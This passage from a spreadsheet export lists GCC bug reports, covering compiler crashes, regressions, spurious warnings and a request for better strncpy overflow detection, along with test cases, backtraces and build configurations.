/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c:18913:22: error: uninitialized const member in 'neon_builtin_datum' is invalid in C++ [-Werror=c++-compat]
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c:17972:22: note: 'num_vars' should be initialized
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c: In function 'arm_output_asm_insn':
/home/mikpe/gcc-4.6-20100828/gcc/config/arm/arm.c:22649:3: error: function might be possible candidate for 'gnu_printf' format attribute [-Werror=missing-format-attribute]
cc1: all warnings being treated as errors
make[3]: *** [arm.o] Error 1
make[3]: Leaving directory `/home/mikpe/objdir46/gcc'
make[2]: *** [all-stage2-gcc] Error 2
make[2]: Leaving directory `/home/mikpe/objdir46'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/home/mikpe/objdir46'
make: *** [bootstrap] Error 2
The first error in arm_ge_pcs_model () was reported 11 days ago as PR45321.  The other 'uninitialized const member' warnings/errors are new since then.  I can't see any obvious recent changes in arm.c that would explain them so I suspect they're caused by some C front-end change.</t>
  </si>
  <si>
    <t>GCC-33565</t>
  </si>
  <si>
    <t>[4.3 regression] spurious  warning: assuming signed overflow does not occur when assuming that (X + c) &gt;= X is always true</t>
  </si>
  <si>
    <t>with -O2 -Wall:
void f (int m int n)
{
  int j
  for (j = m j	&lt; m + 10  j ++)
    do_something (j)
}
t.c:2: warning: assuming signed overflow does not occur when assuming that (X + c) &gt;= X is always true
(also note useless line number)</t>
  </si>
  <si>
    <t>GCC-31663</t>
  </si>
  <si>
    <t>[4.3 Regression] Segfault in constrain_class_visibility with anonymous namespace</t>
  </si>
  <si>
    <t>I get the following segfault with current gcc 4.3.  This was introduced
between 20070330-r123378 (works) and 20070417-r123941 (segfault).  This
is related to the use of anonymous namespace.
I believe it was caused by:
2007-04-16  Seongbae Park 
        PR c++/29365
        * cp/decl2.c (constrain_class_visibility):
        Do not warn about the use of anonymous namespace in the main input file.
(sid)19349:tbm@em64t: ~] /usr/lib/gcc-snapshot/bin/g++ -c kdevelop-mainwindowshare.cc
kdevelop-mainwindowshare.cc:6: internal compiler error: Segmentation fault
Please submit a full bug report
Testcase:
namespace
{
  class ToolbarListView
}
class KEditToolbarWidget
{
  ToolbarListView *m_inactiveList
}
Backtrace:
Program received signal SIGSEGV Segmentation fault.
0x0000000000497f92 in constrain_class_visibility (type=0x2aae86bd2540)
    at /home/tbm/scratch/gcc/gcc/cp/decl2.c:1865
1865                            DECL_SOURCE_FILE (TYPE_MAIN_DECL (ftype))))
(gdb) where
#0  0x0000000000497f92 in constrain_class_visibility (type=0x2aae86bd2540)
    at /home/tbm/scratch/gcc/gcc/cp/decl2.c:1865
#1  0x00000000004915ff in finish_struct_1 (t=0x2aae86bd2540)
    at /home/tbm/scratch/gcc/gcc/cp/class.c:5103
#2  0x0000000000492560 in finish_struct (t=0x2aae868df960 attributes=0x0)
    at /home/tbm/scratch/gcc/gcc/cp/class.c:5221
#3  0x00000000004b9146 in cp_parser_type_specifier (parser=0x2aae86a3f550
    flags= decl_specs=0x7fff247a2f30 is_declaration=1 '\001'
    declares_class_or_enum=0x7fff247a2ee0 is_cv_qualifier=)
    at /home/tbm/scratch/gcc/gcc/cp/parser.c:13821
#4  0x00000000004be14a in cp_parser_decl_specifier_seq (parser=0x2aae86a3f550
    flags=CP_PARSER_FLAGS_OPTIONAL decl_specs=0x7fff247a2f30 declares_class_or_enum=0x7fff247a2f88)
    at /home/tbm/scratch/gcc/gcc/cp/parser.c:8023
#5  0x00000000004c34d5 in cp_parser_simple_declaration (parser=0x2aae86a3f550
    function_definition_allowed_p=1 '\001') at /home/tbm/scratch/gcc/gcc/cp/parser.c:7725
#6  0x00000000004c56e7 in cp_parser_block_declaration (parser=0x2aae86a3f550 statement_p=0 '\0')
    at /home/tbm/scratch/gcc/gcc/cp/parser.c:7686
#7  0x00000000004c805e in cp_parser_declaration (parser=0x2aae86a3f550)
    at /home/tbm/scratch/gcc/gcc/cp/parser.c:7594
#8  0x00000000004c7976 in cp_parser_declaration_seq_opt (parser=0x2aae86a3f550)
    at /home/tbm/scratch/gcc/gcc/cp/parser.c:7489
#9  0x00000000004c7c91 in c_parse_file () at /home/tbm/scratch/gcc/gcc/cp/parser.c:2941
#10 0x00000000005771ea in c_common_parse_file (set_yydebug=)
    at /home/tbm/scratch/gcc/gcc/c-opts.c:1268
#11 0x0000000000786f04 in toplev_main (argc= argv=)
    at /home/tbm/scratch/gcc/gcc/toplev.c:1050
#12 0x00002aae866b2314 in __libc_start_main () from /lib/libc.so.6</t>
  </si>
  <si>
    <t>spark</t>
  </si>
  <si>
    <t>GCC-12831</t>
  </si>
  <si>
    <t>[3.3 regression] ICE with passing reference to bound pointer-to-member-function</t>
  </si>
  <si>
    <t>The example attached compiles with gcc 2.95 (I hope this is correct behavior).
gcc 3.2 says:
 conditional expression between distinct pointer types `int 
   (**)(...)' and `void (foo::**)()' lacks a cast
gcc 3.3.2 (the newest version provided by Debian - unstable) will crash with a
segmentation fault:
 test2.cpp: I function 'int main()':
 test2.cpp:25: internal compiler error: Lagersegmentfejl
It is simply compiled with
 gcc -o test2 test2.cpp
About the example:
I made quz a template class because I discovered the problem using a container
class but you can also make it crash by declaring it as
 void qoo ( void (foo::* &amp; p) (void) )
Output from gcc -v:
LÃ¦ser specifikationer fra /usr/lib/gcc-lib/i486-linux/3.3.2/specs
Konfigureret med: ../src/configure -v
--enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-__cxa_atexit
--enable-clocale=gnu --enable-debug --enable-java-gc=boehm
--enable-java-awt=xlib --enable-objc-gc i486-linux
TrÃ¥dmodel: posix
GCC version 3.3.2 (Debian)</t>
  </si>
  <si>
    <t>waldeinburg</t>
  </si>
  <si>
    <t>GCC-81117</t>
  </si>
  <si>
    <t>Improve buffer overflow checking in strncpy</t>
  </si>
  <si>
    <t>Code:
#include 
char buf[2]
void test(const char* str)
{
    strncpy(buf 12345 sizeof(12345)) // 1
    strncpy(buf 12345 strlen(12345)) // 2
    strncpy(buf str sizeof(str))         // 3
    strncpy(buf str strlen(str))         // 4
}
Compile command:
gcc -c -o test.o -Wall -Wextra -O2 test.c -D_FORTIFY_SOURCE=2
When above code is compiled using gcc 4.8.5 on Linux RHEL 7 x86_64 gcc prints warning about line 3 (-Wsizeof-pointer-memaccess) plus there are two warnings for lines 1 and 3 detected by -D_FORTIFY_SOURCE=2. There are no warnings about buffer overflow in lines 2 and 4 where strlen of source is used instead of buffer size.
What is interesting gcc 5.4.0 from Cygwin x86_64 does not print warnings from -D_FORTIFY_SOURCE=2 only -Wsizeof-pointer-memaccess one.
Please improve these checks to detect cases when user will try to use sizeof or strlen of source string instead of target buffer size.</t>
  </si>
  <si>
    <t>GCC-25234</t>
  </si>
  <si>
    <t>[3.3 Regression] g++ fails to emit debug information for SOME local variables in class member function that has templated local variables</t>
  </si>
  <si>
    <t>Different results on all three versions of g++ [2.95.3 3.3.3 4.0.0].
Only 2.95.3 produces the desired output.
After investigating the bug list several potential duplicates have been dismissed as not being the same issue as listed below:
8542
10156
11098
24526
The issue was first noticed on a SunOS 5.8 SunFire V210 server when trying to upgrade from gcc 2.95.2 to gcc 3.3.3.  All of the following scenarios are reproducible on gdb 6.3 and 6.4.
When trying to debug the following block of code some of the function's local variables can not be displayed using display print or info scope [function].  Display and print will work after a certain point within the stack frame of the function foo() but long after the variables are initialized.  Please examine the following source code and output.
#include 
using std::string
#include 
using std::map
class myElem
{
}
class myMap : public map
{
}
class myClass
{
}
int
foo(myClass&amp; asset)
{
    int          rcode(0)
    unsigned int n
    n = 0
    switch(n)
    {
        default:
            break
    }
#ifndef GOODDBG
    map nfacts
#endif
    myElem mfacts
    return rcode
}
int
main(int argc char *argv[])
{
    myClass c
    foo( c )
    return 0
}
-------------------------------
!!! MISSING THREE SYMBOLS !!!
&gt; g++3.3.3 -Wno-deprecated -gstabs+ -o test test.C
&gt; gdb test
GNU gdb 6.3
Copyright 200....
(gdb) info scope foo
Scope for foo:
Symbol asset is an argument at stack/frame offset 68 length 4.
Symbol mfacts is a local variable at frame offset -41 length 1.
!!! MISSING ONE SYMBOL !!!
&gt; g++3.3.3 -Wno-deprecated -gstabs+ -DGOODDBG -o test test.C
&gt; gdb test
GNU gdb 6.3
Copyright 200....
(gdb) info scope foo
Scope for foo:
Symbol asset is an argument at stack/frame offset 68 length 4.
Symbol rcode is a local variable at frame offset -20 length 4.
Symbol n is a local variable at frame offset -24 length 4.
Symbol mfacts is a local variable at frame offset -25 length 1.
!!! MISSING ONE SYMBOL !!!
&gt; g++4.0.0 -Wno-deprecated -gstabs+ -o test test.C
&gt; gdb test
GNU gdb 6.3
Copyright 200....
(gdb) info scope foo
Scope for foo:
Symbol asset is an argument at stack/frame offset 68 length 4.
Symbol rcode is a local variable at frame offset -24 length 4.
Symbol n is a local variable at frame offset -20 length 4.
Symbol nfacts is a local variable at frame offset -48 length 24.
!!! WORKS CORRECTLY !!!
&gt; g++2.95.2 -Wno-deprecated -gstabs+ -o test test.C
&gt; gdb test
GNU gdb 6.3
Copyright 200....
(gdb) info scope foo
Scope for foo:
Symbol asset is an argument at stack/frame offset 68 length 4.
Symbol rcode is a local variable at frame offset -20 length 4.
Symbol n is a local variable at frame offset -24 length 4.
Symbol nfacts is a local variable at frame offset -40 length 12.
Symbol mfacts is a local variable at frame offset -41 length 1.
Based on the fact that changing the GOODDBG flag alters the appearance of unrelated symbols in the debugger it seems like this is not the desired effect due to optimization or for any other logical reason.</t>
  </si>
  <si>
    <t>schaudhu</t>
  </si>
  <si>
    <t>GCC-45758</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE in expr_invariant_in_loop_p</t>
  </si>
  <si>
    <t>Recent trunk crashes on the following testcase:
&gt; gfortran -c  -floop-block -O3  bug.f90
MODULE util
  INTEGER PARAMETER :: int_4=4
  INTERFACE sort
     MODULE PROCEDURE sort_int_4v
  END INTERFACE
CONTAINS
  SUBROUTINE sort_int_4v ( arr n index )
    INTEGER(KIND=int_4) INTENT(INOUT)       :: arr(1:n)
    INTEGER INTENT(OUT)                     :: INDEX(1:n)
    DO i = 1 n
       INDEX(i) = i
    END DO
1   IF (ir-l&lt;m) THEN
       DO j = l + 1 ir
          DO i = j - 1 1 -1
             IF (arr(i)&lt;=a) GO TO 2
             arr(i+1) = arr(i)
             INDEX(i+1) = INDEX(i)
          END DO
2         arr(i+1) = a
       END DO
    END IF
  END SUBROUTINE sort_int_4v
  SUBROUTINE create_destination_list(list)
    INTEGER DIMENSION(: : :) POINTER     :: list
    INTEGER                                  ::  icpu ncpu stat ultimate_max
    INTEGER ALLOCATABLE DIMENSION(:)       :: index sublist
    ultimate_max=7
    ALLOCATE(INDEX(ultimate_max)STAT=stat)
    CALL t(stat==0)
    ALLOCATE(sublist(ultimate_max)STAT=stat)
    DO icpu=0ncpu-1
       CALL sort(sublistultimate_maxindex)
       list(1:icpu)=sublist
       list(2:icpu)=0
    ENDDO
  END SUBROUTINE create_destination_list
END MODULE
with the following trace
#0  0x0000000000936ad4 in expr_invariant_in_loop_p (loop=0x7faaf9409220 expr=0x7faaf939ef20) at /data03/vondele/gcc_trunk/gcc/gcc/gimple.h:1149
#1  0x0000000000ce643f in evolution_function_is_invariant_rec_p (chrec=0x2 loopnum=4) at /data03/vondele/gcc_trunk/gcc/gcc/tree-chrec.c:1009
#2  0x0000000000ce6337 in evolution_function_is_invariant_rec_p (chrec=0x7faaf941aaf0 loopnum=4) at /data03/vondele/gcc_trunk/gcc/gcc/tree-chrec.c:1028
#3  0x0000000000ce6373 in evolution_function_is_invariant_rec_p (chrec=0x7faaf941ab28 loopnum=4) at /data03/vondele/gcc_trunk/gcc/gcc/tree-chrec.c:1033
#4  0x0000000000ce8318 in chrec_convert_1 (type=0x7faaf947b000 chrec=0x7faaf93efd80 at_stmt=0x0 use_overflow_semantics=1 '\001')
    at /data03/vondele/gcc_trunk/gcc/gcc/tree-chrec.c:1050
#5  0x00000000008e43e3 in analyze_scalar_evolution_1 (loop=0x7faaf9409220 var=0x7faaf9415c30 res=0x7faaf93960f0) at /data03/vondele/gcc_trunk/gcc/gcc/tree-scalar-evolution.c:1804
#6  0x00000000008e5047 in analyze_scalar_evolution (loop=0x7faaf9409220 var=0x7faaf9415c30) at /data03/vondele/gcc_trunk/gcc/gcc/tree-scalar-evolution.c:1950
#7  0x00000000008e6e88 in interpret_rhs_expr (loop=0x7faaf9409220 at_stmt=0x0 type=0x7faaf947b000 rhs1=0x7faaf9415c30 code=MULT_EXPR rhs2=0x7faaf946a410)
    at /data03/vondele/gcc_trunk/gcc/gcc/tree-scalar-evolution.c:1768
#8  0x00000000008e43e3 in analyze_scalar_evolution_1 (loop=0x7faaf9409220 var=0x7faaf941d000 res=0x7faaf93960f0) at /data03/vondele/gcc_trunk/gcc/gcc/tree-scalar-evolution.c:1804
#9  0x00000000008e5047 in analyze_scalar_evolution (loop=0x7faaf9409220 var=0x7faaf941d000) at /data03/vondele/gcc_trunk/gcc/gcc/tree-scalar-evolution.c:1950
#10 0x00000000008e6127 in analyze_scalar_evolution_in_loop (wrto_loop=0x7faaf9409220 use_loop=0x7faaf9409220 version=0x0 folded_casts=0x7fff5174462f )
    at /data03/vondele/gcc_trunk/gcc/gcc/tree-scalar-evolution.c:2038
#11 0x00000000008e628d in simple_iv (wrto_loop=0x7faaf9409220 use_loop=0x2 op=0x8b iv=0x7fff51744680 allow_nonconstant_step=0 '\0')
    at /data03/vondele/gcc_trunk/gcc/gcc/tree-scalar-evolution.c:3132
#12 0x000000000088c29b in dr_analyze_innermost (dr=0x148c8a0) at /data03/vondele/gcc_trunk/gcc/gcc/tree-data-ref.c:794
#13 0x000000000088c97f in create_data_ref (nest=0x7faaf94092a8 memref=0x7faaf93741f8 stmt=0x7faaf9389410 is_read=0 '\0') at /data03/vondele/gcc_trunk/gcc/gcc/tree-data-ref.c:964
#14 0x000000000088d5e6 in graphite_find_data_references_in_stmt (nest=0x7faaf94092a8 stmt=0x7faaf9389410 datarefs=0x7fff51744880)
    at /data03/vondele/gcc_trunk/gcc/gcc/tree-data-ref.c:4262
#15 0x0000000000c7f337 in scopdet_basic_block_info (bb=0x7faaf9412ea0 outermost_loop=0x7faaf94092a8 scops=0x7fff517449f8 type=GBB_LOOP_SING_EXIT_HEADER)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:285
#16 0x0000000000c7fde2 in build_scops_1 (current=0x7faaf9412ea0 outermost_loop=0x7faaf94092a8 scops=0x7fff517449f8 loop=0x7faaf9409330)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:750
#17 0x0000000000c7fac4 in scopdet_basic_block_info (bb=0x7faaf938dc98 outermost_loop=0x7faaf94092a8 scops=0x7fff51744b68 type=)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:636
#18 0x0000000000c7fde2 in build_scops_1 (current=0x7faaf938dc98 outermost_loop=0x7faaf94092a8 scops=0x7fff51744b68 loop=0x7faaf9409330)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:750
#19 0x0000000000c7fa80 in scopdet_basic_block_info (bb=0x7faaf9417340 outermost_loop=0x7faaf94092a8 scops=0x7fff51744cd8 type=)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:697
#20 0x0000000000c7fde2 in build_scops_1 (current=0x7faaf9417340 outermost_loop=0x7faaf94092a8 scops=0x7fff51744cd8 loop=0x7faaf9409330)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:750
#21 0x0000000000c7f7a3 in scopdet_basic_block_info (bb=0x7faaf9412e38 outermost_loop=0x7faaf94092a8 scops=0x7fff51744e48 type=)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:478
#22 0x0000000000c7fde2 in build_scops_1 (current=0x7faaf9412e38 outermost_loop=0x7faaf94092a8 scops=0x7fff51744e48 loop=0x7faaf94092a8)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:750
#23 0x0000000000c7fac4 in scopdet_basic_block_info (bb=0x7faaf94a0ea0 outermost_loop=0x7faaf94092a8 scops=0x7fff51744fb8 type=)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:636
#24 0x0000000000c7fde2 in build_scops_1 (current=0x7faaf94a0ea0 outermost_loop=0x7faaf94092a8 scops=0x7fff51744fb8 loop=0x7faaf94092a8)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:750
#25 0x0000000000c7fa80 in scopdet_basic_block_info (bb=0x7faaf94a0b60 outermost_loop=0x7faaf94092a8 scops=0x7fff51745178 type=)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:697
#26 0x0000000000c7fde2 in build_scops_1 (current=0x7faaf94a0b60 outermost_loop=0x7faaf94092a8 scops=0x7fff51745178 loop=0x7faaf94092a8)
    at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:750
#27 0x0000000000c8020a in build_scops (scops=0x7fff51745230) at /data03/vondele/gcc_trunk/gcc/gcc/graphite-scop-detection.c:1329
#28 0x0000000000c71e61 in graphite_transform_loops () at /data03/vondele/gcc_trunk/gcc/gcc/graphite.c:270
#29 0x0000000000948967 in graphite_transforms () at /data03/vondele/gcc_trunk/gcc/gcc/tree-ssa-loop.c:296
#30 0x00000000007bd5af in execute_one_pass (pass=0x1293780) at /data03/vondele/gcc_trunk/gcc/gcc/passes.c:1573
#31 0x00000000007bd8a5 in execute_pass_list (pass=0x1293780) at /data03/vondele/gcc_trunk/gcc/gcc/passes.c:1628
#32 0x00000000007bd8bd in execute_pass_list (pass=0x1293720) at /data03/vondele/gcc_trunk/gcc/gcc/passes.c:1629
#33 0x00000000007bd8bd in execute_pass_list (pass=0x1293480) at /data03/vondele/gcc_trunk/gcc/gcc/passes.c:1629
#34 0x00000000007bd8bd in execute_pass_list (pass=0x1292ac0) at /data03/vondele/gcc_trunk/gcc/gcc/passes.c:1629</t>
  </si>
  <si>
    <t>GCC-60291</t>
  </si>
  <si>
    <t>[4.8 Regression] slow compile times for any mode (-O0/-O1/-O2) on large .c source file (30MBs)</t>
  </si>
  <si>
    <t>Created attachment 32182
ghc14232_3.hc.i.bz2 - compressed source file (30MBs uncompressed)
GHC (glasgow haskell compiler) in it's portable mode generates
intermediate .C source files. Sometimes they are really large: 20-100 MB.
Even on core-i7 building such files takes: 3-5 minutes.
On slower boxes/arches things are worse and go up to 20-60 minutes.
clang does not seem to have such problems [1].
gcc version should not be very relevant. Time test are for [2].
If the problem is hard to fix in gcc what options would you
suggest to enable to get sane build times? -fno-unit-at-a-time
does not seem to help.
Thanks!
[1]:
[sf] /tmp/__z:time gcc -O0 -Wno-ignored-attributes -c ghc14232_3.hc.i -o gcc.o
real    5m19.975s
user    5m18.403s
sys     0m0.629s
[sf] /tmp/__z:time gcc -O1 -Wno-ignored-attributes -c ghc14232_3.hc.i -o gcc.o
real    3m0.557s
user    2m58.496s
sys     0m0.623s
[sf] /tmp/__z:time gcc -O2 -Wno-ignored-attributes -c ghc14232_3.hc.i -o gcc.o
real    3m21.315s
user    3m19.691s
sys     0m0.550s
[sf] /tmp/__z:time clang -O0 -Wno-ignored-attributes -c ghc14232_3.hc.i -o clang.o
real    0m19.661s
user    0m19.356s
sys     0m0.234s
[sf] /tmp/__z:time clang -O1 -Wno-ignored-attributes -c ghc14232_3.hc.i -o clang.o
real    0m49.612s
user    0m49.145s
sys     0m0.295s
[sf] /tmp/__z:time clang -O2 -Wno-ignored-attributes -c ghc14232_3.hc.i -o clang.o
real    0m48.991s
user    0m48.539s
sys     0m0.278s
[2]:
Using built-in specs.
COLLECT_GCC=/usr/x86_64-pc-linux-gnu/gcc-bin/4.8.2/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.8.2/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /subvolumes/var_tmp/portage/sys-devel/gcc-4.8.2-r1/work/gcc-4.8.2/configure --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.8.2 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.2/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.2 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.2/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.2/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.2/include/g++-v4 --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.8.2/python --enable-languages=cc++fortran --enable-obsolete --enable-secureplt --disable-werror --with-system-zlib --enable-nls --without-included-gettext --enable-checking=release --with-bugurl=https://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.8.2-r1 p1.4-ssptest pie-0.5.9-ssptest' --enable-libstdcxx-time --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-multilib --with-multilib-list=m32m64 --disable-altivec --disable-fixed-point --enable-targets=all --disable-libgcj --enable-libgomp --disable-libmudflap --disable-libssp --enable-lto --without-cloog
Thread model: posix
gcc version 4.8.2 (Gentoo 4.8.2-r1 p1.4-ssptest pie-0.5.9-ssptest)</t>
  </si>
  <si>
    <t>GCC-43309</t>
  </si>
  <si>
    <t>amd64 TLS IE code sequence on Solaris 2/x86 violates spec</t>
  </si>
  <si>
    <t>While investigating the Solaris 11/x86 testsuite results I noticed that some 
64-bit libgomp test cases were failing.  The failure boils down to the attached
tie.c program.
If compiled/linked with GNU as/Sun ld the resulting binary SEGVs:
$ gcc -m64 -fopenmp -o tie.sun tie.c
$ ./tie.sun
Segmentation Fault
If instead GNU as and ld are used everything works fine:
$ gcc -m64 -fopenmp -o tie.gnu tie.c
$ ./tie.gnu
$ 
As described in an initial patch submission it turns out that the amd64 TLS
IE code sequence emitted by gcc doesn't follow the published Solaris 2 ABI
nor the current `ELF Handling for Thread-Local Storage' spec at
  http://people.redhat.com/drepper/tls.pdf
While GNU ld copes with that just fine Sun ld cannot handle this and breaks
the code emitted by gcc.</t>
  </si>
  <si>
    <t>GCC-78720</t>
  </si>
  <si>
    <t>[7 Regression] Illegal instruction in generated code</t>
  </si>
  <si>
    <t>Created attachment 40278
reproducer
&gt; g++ -O2 -march=nehalem -o opt illegal_inst.cpp illegal_inst_const.cpp
&gt; ./opt
Illegal instruction
This is regression which was introduced in trunk couple days ago.
&gt; gcc --version
gcc (GCC) 7.0.0 20161207 (experimental)</t>
  </si>
  <si>
    <t>GCC-21188</t>
  </si>
  <si>
    <t>[4.1 Regression] CbcModel.cpp:3571: internal compiler error: in compare_values at tree-vrp.c:292</t>
  </si>
  <si>
    <t>compilation fails with an internal error...
 g++-4 -v
Using built-in specs.
Target: powerpc-apple-darwin7
Configured with: ../configure --prefix=/sw --prefix=/sw/lib/gcc4 --enable-
languages=cc++f95objc --infodir=/share/info --with-gmp=/sw --with-included-gettext --
host=powerpc-apple-darwin7 --with-as=/sw/lib/odcctools/bin/as --with-ld=/sw/lib/odcctools/bin/
ld
Thread model: posix
gcc version 4.1.0 20050417 (experimental)
the problem is triggered by:
 /sw/lib/gcc4/libexec/gcc/powerpc-apple-darwin7/4.1.0/cc1plus -fpreprocessed CbcModel.ii -fPIC 
-quiet -dumpbase CbcModel.cpp -auxbase-strip Darwin-O3/CbcModel.o -O3 -Wall -Wpointer-arith 
-Wcast-qual -Wwrite-strings -Wconversion -version -o CbcModel.s
GNU C++ version 4.1.0 20050417 (experimental) (powerpc-apple-darwin7)
        compiled by GNU C version 3.3 20030304 (Apple Computer Inc. build 1495).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
CbcModel.cpp: In member function 'CbcModel* CbcModel::findCliques(bool int int int)':
CbcModel.cpp:3369: warning: operation on 'numberCliques' may be undefined
CbcModel.cpp: In member function 'double CbcModel::checkSolution(double const double* bool)':
CbcModel.cpp:3878: warning: unused variable 'integerTolerance'
CbcModel.cpp: In member function 'void CbcModel::originalModel(CbcModel* bool)':
CbcModel.cpp:4862: warning: unused variable 'numberIntegerInfeasibilities'
CbcModel.cpp:4863: warning: unused variable 'numberObjectInfeasibilities'
CbcModel.cpp: In member function 'void CbcModel::findIntegers(bool)':
CbcModel.cpp:3571: internal compiler error: in compare_values at tree-vrp.c:292
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
but how do i include the problematic file?</t>
  </si>
  <si>
    <t>devries</t>
  </si>
  <si>
    <t>GCC-21589</t>
  </si>
  <si>
    <t>[3.4 only] FAIL: gcc.dg/noreturn-7.c  (test for warnings line 21)</t>
  </si>
  <si>
    <t>Executing on host: /xxx/gnu/gcc-3.3/objdir/gcc/xgcc -B/xxx/gnu/gcc-3.3/objdir/gc
c/ /xxx/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/noreturn-7.c   -O2 -Wreturn-type -W
missing-noreturn -S  -o noreturn-7.s    (timeout = 300)
/xxx/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/noreturn-7.c: In function `k':
/xxx/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/noreturn-7.c:42: warning: control reac
hes end of non-void function
output is:
/xxx/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/noreturn-7.c: In function `k':
/xxx/gnu/gcc-3.3/gcc/gcc/testsuite/gcc.dg/noreturn-7.c:42: warning: control reac
hes end of non-void function
FAIL: gcc.dg/noreturn-7.c  (test for warnings line 21)
PASS: gcc.dg/noreturn-7.c  (test for bogus messages line 28)
PASS: gcc.dg/noreturn-7.c  (test for bogus messages line 35)
PASS: gcc.dg/noreturn-7.c  (test for warnings line 42)
PASS: gcc.dg/noreturn-7.c (test for excess errors)
This is fixed in 4.0.</t>
  </si>
  <si>
    <t>GCC-39188</t>
  </si>
  <si>
    <t>G++ doesn't handle static anonymous union right</t>
  </si>
  <si>
    <t>GCC-47903</t>
  </si>
  <si>
    <t>[4.5 Regression] var-tracking.c: valgrind error</t>
  </si>
  <si>
    <t>Created attachment 23476
C++ source code
I just tried to compile the attached C++ code with the latest 4.6 snapshot
20110219 under valgrind on a Linux x86_64 box.
Valgrind said
==12657== Conditional jump or move depends on uninitialised value(s)
==12657==    at 0xACA1EC: loc_cmp (var-tracking.c:2817)
==12657==    by 0xACA95D: onepart_variable_different_p (var-tracking.c:4402)
==12657==    by 0xAD1D32: emit_notes_for_differences_1 (var-tracking.c:4421)
==12657==    by 0xE09FA7: htab_traverse_noresize (hashtab.c:784)
==12657==    by 0xAD59E0: vt_emit_notes (var-tracking.c:7629)
==12657==    by 0xAD8D22: variable_tracking_main (var-tracking.c:8583)
==12657==    by 0x895D35: execute_one_pass (passes.c:1556)
==12657==    by 0x896034: execute_pass_list (passes.c:1611)
==12657==    by 0x896046: execute_pass_list (passes.c:1612)
==12657==    by 0x896046: execute_pass_list (passes.c:1612)
==12657==    by 0x98E6E5: tree_rest_of_compilation (tree-optimize.c:422)
==12657==    by 0xB32921: cgraph_expand_function (cgraphunit.c:1576)
==12657==
==12657== Conditional jump or move depends on uninitialised value(s)
==12657==    at 0xACA960: onepart_variable_different_p (var-tracking.c:4402)
==12657==    by 0xAD1D32: emit_notes_for_differences_1 (var-tracking.c:4421)
==12657==    by 0xE09FA7: htab_traverse_noresize (hashtab.c:784)
==12657==    by 0xAD59E0: vt_emit_notes (var-tracking.c:7629)
==12657==    by 0xAD8D22: variable_tracking_main (var-tracking.c:8583)
==12657==    by 0x895D35: execute_one_pass (passes.c:1556)
==12657==    by 0x896034: execute_pass_list (passes.c:1611)
==12657==    by 0x896046: execute_pass_list (passes.c:1612)
==12657==    by 0x896046: execute_pass_list (passes.c:1612)
==12657==    by 0x98E6E5: tree_rest_of_compilation (tree-optimize.c:422)
==12657==    by 0xB32921: cgraph_expand_function (cgraphunit.c:1576)
==12657==    by 0xB35069: cgraph_optimize (cgraphunit.c:1635)
==12657==
Flags -g -O3 required.</t>
  </si>
  <si>
    <t>GCC-20900</t>
  </si>
  <si>
    <t>use-associated variable may not be equivalenced</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
MODULE TEST
 INTEGER :: I
END MODULE
! note 11.7
USE TEST ONLY : K=&gt;I
INTEGER :: L
EQUIVALENCE(KL)
END</t>
  </si>
  <si>
    <t>GCC-35406</t>
  </si>
  <si>
    <t>gfortran.dg/ldist-1.f90 and gcc.dg/tree-ssa/ldist-4.c don't work</t>
  </si>
  <si>
    <t>On Linux/x86-64 I got
FAIL: gfortran.dg/ldist-1.f90  -O  scan-tree-dump-times ldist distributed: split to 4 loops 1
FAIL: gcc.dg/tree-ssa/ldist-4.c scan-tree-dump-times ldist distributed: split to 2 loops 0</t>
  </si>
  <si>
    <t>GCC-52730</t>
  </si>
  <si>
    <t>Java front end emits assembly</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 185813 gave
